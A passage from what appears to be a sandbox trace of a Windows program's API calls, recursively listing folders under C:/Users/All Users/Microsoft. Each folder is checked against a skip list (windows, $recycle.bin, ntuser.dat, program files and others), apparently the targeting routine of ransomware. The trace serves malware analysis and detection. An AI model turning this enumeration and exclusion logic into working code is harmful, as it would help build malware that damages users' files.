lpString2="DeviceSync" | out: lpString1="C:/Users\\All Users\\Microsoft\\DeviceSync") returned="C:/Users\\All Users\\Microsoft\\DeviceSync" [0144.154] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\DeviceSync", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\DeviceSync\\") returned="C:/Users\\All Users\\Microsoft\\DeviceSync\\" [0144.154] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\DeviceSync\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\DeviceSync\\") returned="C:/Users\\All Users\\Microsoft\\DeviceSync\\" [0144.154] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\DeviceSync\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\DeviceSync\\*.*") returned="C:/Users\\All Users\\Microsoft\\DeviceSync\\*.*" [0144.154] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\DeviceSync\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0144.156] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.156] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0144.156] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.157] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.157] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 0 [0144.157] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0144.157] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="DRM", cAlternateFileName="")) returned 1 [0144.157] lstrcmpiW (lpString1="DRM", lpString2=".") returned 1 [0144.157] lstrcmpiW (lpString1="DRM", lpString2="..") returned 1 [0144.157] lstrcmpiW (lpString1="DRM", lpString2="...") returned 1 [0144.157] lstrcmpiW (lpString1="DRM", lpString2="windows") returned -1 [0144.157] lstrcmpiW (lpString1="DRM", lpString2="$recycle.bin") returned 1 [0144.157] lstrcmpiW (lpString1="DRM", lpString2="rsa") returned -1 [0144.157] lstrcmpiW (lpString1="DRM", lpString2="ntuser.dat") returned -1 [0144.157] lstrcmpiW (lpString1="DRM", lpString2="programdata") returned -1 [0144.157] lstrcmpiW (lpString1="DRM", lpString2="appdata") returned 1 [0144.157] lstrcmpiW (lpString1="DRM", lpString2="program files") returned -1 [0144.157] lstrcmpiW (lpString1="DRM", lpString2="program files (x86)") returned -1 [0144.157] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0144.158] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="DRM" | out: lpString1="C:/Users\\All Users\\Microsoft\\DRM") returned="C:/Users\\All Users\\Microsoft\\DRM" [0144.158] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\DRM", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\DRM\\") returned="C:/Users\\All Users\\Microsoft\\DRM\\" [0144.158] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\DRM\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\DRM\\") returned="C:/Users\\All Users\\Microsoft\\DRM\\" [0144.158] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\DRM\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\DRM\\*.*") returned="C:/Users\\All Users\\Microsoft\\DRM\\*.*" [0144.158] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\DRM\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0144.158] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.158] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0144.158] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.158] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.158] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Server", cAlternateFileName="")) returned 1 [0144.158] lstrcmpiW (lpString1="Server", lpString2=".") returned 1 [0144.158] lstrcmpiW (lpString1="Server", lpString2="..") returned 1 [0144.158] lstrcmpiW (lpString1="Server", lpString2="...") returned 1 [0144.158] lstrcmpiW (lpString1="Server", lpString2="windows") returned -1 [0144.158] lstrcmpiW (lpString1="Server", lpString2="$recycle.bin") returned 1 [0144.158] lstrcmpiW (lpString1="Server", lpString2="rsa") returned 1 [0144.158] lstrcmpiW (lpString1="Server", lpString2="ntuser.dat") returned 1 [0144.158] lstrcmpiW (lpString1="Server", lpString2="programdata") returned 1 [0144.159] lstrcmpiW (lpString1="Server", lpString2="appdata") returned 1 [0144.159] lstrcmpiW (lpString1="Server", lpString2="program files") returned 1 [0144.159] lstrcmpiW (lpString1="Server", lpString2="program files (x86)") returned 1 [0144.159] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\DRM\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\DRM\\") returned="C:/Users\\All Users\\Microsoft\\DRM\\" [0144.159] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\DRM\\", lpString2="Server" | out: lpString1="C:/Users\\All Users\\Microsoft\\DRM\\Server") returned="C:/Users\\All Users\\Microsoft\\DRM\\Server" [0144.159] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\DRM\\Server", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\DRM\\Server\\") returned="C:/Users\\All Users\\Microsoft\\DRM\\Server\\" [0144.159] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\DRM\\Server\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\DRM\\Server\\") returned="C:/Users\\All Users\\Microsoft\\DRM\\Server\\" [0144.159] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\DRM\\Server\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\DRM\\Server\\*.*") returned="C:/Users\\All Users\\Microsoft\\DRM\\Server\\*.*" [0144.159] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\DRM\\Server\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0144.159] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.159] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0144.159] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.159] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.159] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 0 [0144.159] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0144.159] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Server", cAlternateFileName="")) returned 0 [0144.159] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0144.160] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="eHome", cAlternateFileName="")) returned 1 [0144.160] lstrcmpiW (lpString1="eHome", lpString2=".") returned 1 [0144.160] lstrcmpiW (lpString1="eHome", lpString2="..") returned 1 [0144.160] lstrcmpiW (lpString1="eHome", lpString2="...") returned 1 [0144.160] lstrcmpiW (lpString1="eHome", lpString2="windows") returned -1 [0144.160] lstrcmpiW (lpString1="eHome", lpString2="$recycle.bin") returned 1 [0144.160] lstrcmpiW (lpString1="eHome", lpString2="rsa") returned -1 [0144.160] lstrcmpiW (lpString1="eHome", lpString2="ntuser.dat") returned -1 [0144.160] lstrcmpiW (lpString1="eHome", lpString2="programdata") returned -1 [0144.160] lstrcmpiW (lpString1="eHome", lpString2="appdata") returned 1 [0144.160] lstrcmpiW (lpString1="eHome", lpString2="program files") returned -1 [0144.160] lstrcmpiW (lpString1="eHome", lpString2="program files (x86)") returned -1 [0144.160] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0144.160] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="eHome" | out: lpString1="C:/Users\\All Users\\Microsoft\\eHome") returned="C:/Users\\All Users\\Microsoft\\eHome" [0144.160] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\eHome", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\eHome\\") returned="C:/Users\\All Users\\Microsoft\\eHome\\" [0144.160] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\eHome\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\eHome\\") returned="C:/Users\\All Users\\Microsoft\\eHome\\" [0144.160] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\eHome\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\eHome\\*.*") returned="C:/Users\\All Users\\Microsoft\\eHome\\*.*" [0144.160] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\eHome\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0144.160] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.161] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0144.161] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.161] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.161] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="logs", cAlternateFileName="")) returned 1 [0144.161] lstrcmpiW (lpString1="logs", lpString2=".") returned 1 [0144.161] lstrcmpiW (lpString1="logs", lpString2="..") returned 1 [0144.161] lstrcmpiW (lpString1="logs", lpString2="...") returned 1 [0144.161] lstrcmpiW (lpString1="logs", lpString2="windows") returned -1 [0144.161] lstrcmpiW (lpString1="logs", lpString2="$recycle.bin") returned 1 [0144.161] lstrcmpiW (lpString1="logs", lpString2="rsa") returned -1 [0144.161] lstrcmpiW (lpString1="logs", lpString2="ntuser.dat") returned -1 [0144.161] lstrcmpiW (lpString1="logs", lpString2="programdata") returned -1 [0144.161] lstrcmpiW (lpString1="logs", lpString2="appdata") returned 1 [0144.161] lstrcmpiW (lpString1="logs", lpString2="program files") returned -1 [0144.161] lstrcmpiW (lpString1="logs", lpString2="program files (x86)") returned -1 [0144.161] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\eHome\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\eHome\\") returned="C:/Users\\All Users\\Microsoft\\eHome\\" [0144.161] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\eHome\\", lpString2="logs" | out: lpString1="C:/Users\\All Users\\Microsoft\\eHome\\logs") returned="C:/Users\\All Users\\Microsoft\\eHome\\logs" [0144.161] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\eHome\\logs", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\eHome\\logs\\") returned="C:/Users\\All Users\\Microsoft\\eHome\\logs\\" [0144.161] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\eHome\\logs\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\eHome\\logs\\") returned="C:/Users\\All Users\\Microsoft\\eHome\\logs\\" [0144.161] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\eHome\\logs\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\eHome\\logs\\*.*") returned="C:/Users\\All Users\\Microsoft\\eHome\\logs\\*.*" [0144.161] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\eHome\\logs\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4e004c, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0144.164] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.164] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4e004c, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0144.164] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.164] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.164] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4e004c, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 0 [0144.164] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0144.164] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="logs", cAlternateFileName="")) returned 0 [0144.164] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0144.164] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Event Viewer", cAlternateFileName="EVENTV~1")) returned 1 [0144.165] lstrcmpiW (lpString1="Event Viewer", lpString2=".") returned 1 [0144.165] lstrcmpiW (lpString1="Event Viewer", lpString2="..") returned 1 [0144.165] lstrcmpiW (lpString1="Event Viewer", lpString2="...") returned 1 [0144.165] lstrcmpiW (lpString1="Event Viewer", lpString2="windows") returned -1 [0144.165] lstrcmpiW (lpString1="Event Viewer", lpString2="$recycle.bin") returned 1 [0144.165] lstrcmpiW (lpString1="Event Viewer", lpString2="rsa") returned -1 [0144.165] lstrcmpiW (lpString1="Event Viewer", lpString2="ntuser.dat") returned -1 [0144.165] lstrcmpiW (lpString1="Event Viewer", lpString2="programdata") returned -1 [0144.165] lstrcmpiW (lpString1="Event Viewer", lpString2="appdata") returned 1 [0144.165] lstrcmpiW (lpString1="Event Viewer", lpString2="program files") returned -1 [0144.165] lstrcmpiW (lpString1="Event Viewer", lpString2="program files (x86)") returned -1 [0144.165] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0144.165] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="Event Viewer" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer") returned="C:/Users\\All Users\\Microsoft\\Event Viewer" [0144.165] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\") returned="C:/Users\\All Users\\Microsoft\\Event Viewer\\" [0144.165] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\Event Viewer\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\") returned="C:/Users\\All Users\\Microsoft\\Event Viewer\\" [0144.165] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\*.*") returned="C:/Users\\All Users\\Microsoft\\Event Viewer\\*.*" [0144.165] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Event Viewer\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0144.168] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.168] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0144.168] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.168] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.168] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Views", cAlternateFileName="")) returned 1 [0144.168] lstrcmpiW (lpString1="Views", lpString2=".") returned 1 [0144.168] lstrcmpiW (lpString1="Views", lpString2="..") returned 1 [0144.168] lstrcmpiW (lpString1="Views", lpString2="...") returned 1 [0144.168] lstrcmpiW (lpString1="Views", lpString2="windows") returned -1 [0144.168] lstrcmpiW (lpString1="Views", lpString2="$recycle.bin") returned 1 [0144.168] lstrcmpiW (lpString1="Views", lpString2="rsa") returned 1 [0144.168] lstrcmpiW (lpString1="Views", lpString2="ntuser.dat") returned 1 [0144.168] lstrcmpiW (lpString1="Views", lpString2="programdata") returned 1 [0144.168] lstrcmpiW (lpString1="Views", lpString2="appdata") returned 1 [0144.168] lstrcmpiW (lpString1="Views", lpString2="program files") returned 1 [0144.168] lstrcmpiW (lpString1="Views", lpString2="program files (x86)") returned 1 [0144.168] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Event Viewer\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\") returned="C:/Users\\All Users\\Microsoft\\Event Viewer\\" [0144.168] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\", lpString2="Views" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views") returned="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views" [0144.168] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\") returned="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\" [0144.168] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\") returned="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\" [0144.169] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\*.*") returned="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\*.*" [0144.169] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, 